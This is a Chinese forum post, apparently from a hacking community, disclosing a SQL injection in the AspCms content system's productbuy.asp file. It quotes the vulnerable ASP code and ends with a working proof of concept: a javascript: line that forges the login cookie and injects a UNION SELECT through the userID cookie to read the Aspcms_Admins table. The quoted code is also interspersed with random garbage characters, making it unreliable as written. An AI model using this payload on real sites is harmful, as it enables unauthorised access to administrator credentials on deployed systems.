好久没上土司了,上来一看发现在删号名单内.....
; e Z* g$ _+ [/ m( F5 k也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。. I, d: E) {9 @
废话不多说,看代码:4 R1 z8 S* B1 Q- [
1 v& n9 r3 s( ?: B<%, B# t- @/ t& m' T4 }& s; e
' r* E( k" M s u9 w# \& X a! c$ H
if action = "buy" then! A3 G! U& L9 G4 N% X; R1 R& x' r
7 y0 d. ?% ?1 w, F# \. @ addOrder()
% ]* ^% f& a& ?0 a' K( i: R7 b- K
2 ]6 l+ a* z! j1 ?else
8 ]) y0 t% X7 |3 o L6 }4 E
7 J% ~! c" H$ D/ D echoContent()
3 x8 k7 E) f8 Q+ o8 d! q6 I
. c0 F, J& k0 send if
2 W: e1 e: x5 M3 Z* K4 Y. I1 n( H8 c
4 }/ ?/ A- s; J8 ?7 p6 {4 w. z8 Y( E( e$ F
……略过+ ~6 W6 M9 k G* {0 o" K
4 K. [4 C$ k4 q7 Z7 h3 Z
. X* ^6 T8 k4 G9 Y; s7 p8 f
/ v0 I0 f# V1 T# g
Sub echoContent()
! o! p u: X) f# H" B4 [
: W* V' ]+ f) o. m5 `, t" S dim id
- ~% e# x0 @2 l: W% `2 t) _; a. s. n2 A2 H
id=getForm("id","get")
" a7 v- T/ D( k: K" {5 t* }
: R7 Y. b2 L% y" }+ K+ M4 ^- w ! c8 y3 j3 m& O& \
0 U1 n8 x; ] `7 n
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" ! e( t2 r0 [' h# X2 s
1 E. o/ T7 m1 V. y9 P9 ^
9 T) J1 M, Y, t7 B) W2 L
3 D- G B( B+ j1 w+ H+ n% i dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template") o/ K( `* | J" B0 ~! k
: H+ j) h( F' g" r- J6 g dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct" E1 y0 A" ~* q2 q
2 m) Z8 @; n4 D+ s Dim templatePath,tempStr
3 C. _8 A6 Q |. c( g
& h& Q9 K1 \7 A/ k) s4 q templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
3 r1 U7 Q: {8 `- |3 H p$ b4 C
R; b2 B8 M3 j y) D' ] s
) W9 g) f/ X! h. u- Q) L
1 k$ Y0 k# V# q$ Y- I- h2 b. [ u set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
* w7 C3 r9 }1 ~6 t
9 v. E: r# C" @. c! U selectproduct=rsObj(0)! q! ] h! |0 R2 F( K
: f9 ^/ J l% ]! N7 x
6 G+ |* _+ V8 X6 }& h" S$ T, a/ c) H, D) p, B; K9 i
Dim linkman,gender,phone,mobile,email,qq,address,postcode# }2 h% o6 I, g5 e: v% B
( a$ K2 D0 o& F+ z0 j
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
. w3 m- g0 a# \ v5 e7 a1 M+ T; y5 O4 e- ~# [3 k5 ?
if rCookie("loginstatus")=1 then 4 f# Q4 V/ S5 e' A) F
8 z; U2 x; }7 { o set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
a# c1 \; a7 {
# `# o# Y; g5 v& Z% {3 d linkman=rsObj("truename")# C- c4 I. D' |& {; s8 q( Z& R7 n+ ^
* ?( E) P9 ~& q1 k
gender=rsObj("gender")
9 m; R4 N8 {) q+ a* p) n9 l+ r ~) V# ~5 l* u& S
phone=rsObj("phone")
9 `4 N# B4 Y) U. J
+ w* Q- L! U% Z! A mobile=rsObj("mobile")
/ v/ V5 J& i2 W3 ?3 x4 d
# p! k5 @& I* p email=rsObj("email")
5 [3 Z7 _ M# k- G' L* ]! p% C' z- G8 E4 U. W$ Z# |7 F* ^7 A
qq=rsObj("qq")6 W+ b9 t" t- T3 }9 i- g' `. C
$ U) Q7 n/ ]# x4 m0 P$ x address=rsObj("address"); r9 D% F) }+ T! T% A/ b B
+ t( k- m; L- O! V$ J+ b postcode=rsObj("postcode"), C b( M7 ^ l: p, {5 k i6 f
9 i! I0 ?" }* l0 [7 {+ I else
. Z2 ^7 J* n: ~
& T! ?! `. \6 Y) W+ b) F. ? gender=13 m( t6 _5 a& T, e
# h1 F; B9 h' _7 J( [
end if. M) F: l% B+ p8 ?" V
; O9 p3 Z; N% g" y) K rsObj.close()
5 w8 Y9 ^$ i6 N; c+ u `" w' m* M1 P# j. H' ]7 c$ b+ W. @4 v" h
/ J1 `6 r+ ?( K' ?/ B
1 j* M f" o8 P f* A% ] with templateObj , u$ X( A( n9 N4 J0 N7 J7 o
, N4 d+ [/ o, {) _, z
.content=loadFile(templatePath)
. s8 s) f7 { X/ T' S. }3 ~* }5 ]5 C$ k. M; P
.parseHtml(), Z1 `, c+ d8 t9 k9 U) {9 B
( a4 N, _* {* N6 i0 f2 `
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct): f3 v( {6 v2 G
6 y$ }, X: c7 e! U% Z, d
.content=replaceStr(.content,"[aspcms:linkman]",linkman) # C. r1 B) c3 E, ~+ ?
6 S( X1 n) e( }0 s k0 p$ G .content=replaceStr(.content,"[aspcms:gender]",gender)
( e$ ?0 k2 _. X; q2 [; e
2 z2 K, d7 t* Z5 {6 E) D .content=replaceStr(.content,"[aspcms:phone]",phone) ) @ J2 R4 o/ T2 S4 k) G0 a
* w' ~; T, i+ w _& y D
.content=replaceStr(.content,"[aspcms:mobile]",mobile) - C, b$ g3 Z$ z. k' J
4 @' {* Q" q5 N- Y" _! a
.content=replaceStr(.content,"[aspcms:email]",email) . S; z9 p+ A2 \, K8 d
6 e$ L$ `; ] a: f/ T% R
.content=replaceStr(.content,"[aspcms:qq]",qq) 9 Q; P8 I F8 t% y) I
! p$ N, g6 ?) `9 ^ .content=replaceStr(.content,"[aspcms:address]",address) 7 k" j" s9 L4 r/ W
" O: q' X7 _- V4 i } .content=replaceStr(.content,"[aspcms:postcode]",postcode)
! f6 m, A! u7 v1 x; t4 O$ i h7 E9 Q2 K0 }% h4 n
.parseCommon()
' l- ^/ a, J4 K. v9 e" m+ w! t; Z( K% d/ q5 M
echo .content
]. w( }* q5 ]0 u3 h( X" Y; X+ ^
" G1 `! i1 c! w1 U* G( A: z end with
: ]% |7 \" M8 k3 ?" T c* w
/ d9 _2 D& L# v1 d set templateobj =nothing : terminateAllObjects
* E( x3 k6 Q0 \
! h9 s# P5 E+ k, W( S! P, J1 eEnd Sub
. h4 a9 ]0 g# y I4 b2 g漏洞很明显,没啥好说的
7 i8 S, A+ O. v7 I9 C; K5 w7 W4 apoc:
. @+ A' z. l" x" q* }8 a+ S* E
3 S" s$ y' L8 c5 b. Hjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子 e' b- p! n( r* \! n
5 A. c6 M1 h% _0 ~" |
|
发表于 2012-12-27 08:35:05
收藏
支持
反对